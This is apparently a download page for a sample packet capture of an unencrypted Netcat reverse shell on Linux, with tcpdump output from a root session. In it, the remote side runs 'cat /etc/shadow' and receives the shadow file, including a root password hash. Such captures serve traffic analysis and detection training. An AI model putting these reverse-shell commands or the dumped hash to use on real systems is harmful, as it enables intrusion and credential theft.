Unencrypted Reverse Shell Netcat NC Linux Traffic PCAP file download

Download Attachments

  • 1 pcap reverse
    Date added: September 23, 2016 12:59 am Added by: admin File size: 4 KB Downloads: 101

Example of a Netcat unencrypted reverse shell on Linux

 

2016-05-01 23:02:12.930559 IP 192.168.1.100.45222 > 192.168.1.146.4444: Flags [P.], seq 57:96, ack 11, win 229, options [nop,nop,TS val 653200239 ecr 1226323781], length 39
E..[..@.@..D…d…….\0.q.D…………..
&..oI.7Euid=0(root) gid=0(root) groups=0(root)

2016-05-01 23:02:12.991630 IP 192.168.1.146.4444 > 192.168.1.100.45222: Flags [.], ack 96, win 259, options [nop,nop,TS val 1226323844 ecr 653200239], length 0
E..4].@…………d.\..D…0.q…………
I.7.&..o
2016-05-01 23:02:18.201395 IP 192.168.1.146.4444 > 192.168.1.100.45222: Flags [P.], seq 11:21, ack 96, win 259, options [nop,nop,TS val 1226329053 ecr 653200239], length 10
E..>].@…………d.\..D…0.q…..d……
I.K.&..opwned s0n

2016-05-01 23:02:18.239958 IP 192.168.1.100.45222 > 192.168.1.146.4444: Flags [.], ack 21, win 229, options [nop,nop,TS val 653201567 ecr 1226329053], length 0
E..4..@.@..j…d…….\0.q.D……..m…..
&…I.K.
2016-05-01 23:02:23.545462 IP 192.168.1.146.4444 > 192.168.1.100.45222: Flags [P.], seq 21:37, ack 96, win 259, options [nop,nop,TS val 1226334397 ecr 653201567], length 16
E..D].@…………d.\..D…0.q……g…..
I.`.&…cat /etc/shadow

2016-05-01 23:02:23.545537 IP 192.168.1.100.45222 > 192.168.1.146.4444: Flags [.], ack 37, win 229, options [nop,nop,TS val 653202893 ecr 1226334397], length 0
E..4..@.@..i…d…….\0.q.D……..m…..
&…I.`.
2016-05-01 23:02:23.547480 IP 192.168.1.100.45222 > 192.168.1.146.4444: Flags [P.], seq 96:2070, ack 37, win 229, options [nop,nop,TS val 653202893 ecr 1226334397], length 1974
E…..@.@……d…….\0.q.D……..#…..
&…I.`.root:$6$rI6gWJc4$Kq9MtiJUtw2fov7C.JC/lb2h5V6a2nw2K9Tgm9uYDjA4/XZOUZ.vJq1qe374i6gO.pH/Ai3yoO3EmMowhlBJ7.:16860:0:99999:7:::
daemon:*:16820:0:99999:7:::
bin:*:16820:0:99999:7:::
sys:*:16820:0:99999:7:::
sync:*:16820:0:99999:7:::
games:*:16820:0:99999:7:::
man:*:16820:0:99999:7:::
lp:*:16820:0:99999:7:::
mail:*:16820:0:99999:7:::

Leave a Reply